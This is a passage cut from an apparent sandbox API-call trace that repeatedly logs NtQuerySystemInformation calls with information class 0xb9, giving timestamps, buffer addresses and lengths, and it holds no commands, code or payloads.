ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe560, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4e0, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4e0, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4e0, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x58, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x58, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0209.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x28, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x28, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x28, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe500, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe570, Length=0x20, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x38, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe580, Length=0x20, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe580, Length=0x20, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae8, Length=0x50, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0210.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0210.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe840, Length=0x28, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8b0, Length=0x28, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0210.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x28, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0210.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe990, Length=0x50, ResultLength=0x0) [0210.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8c0, Length=0x38, ResultLength=0x0) [0210.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.017] NtQuerySystemInformation 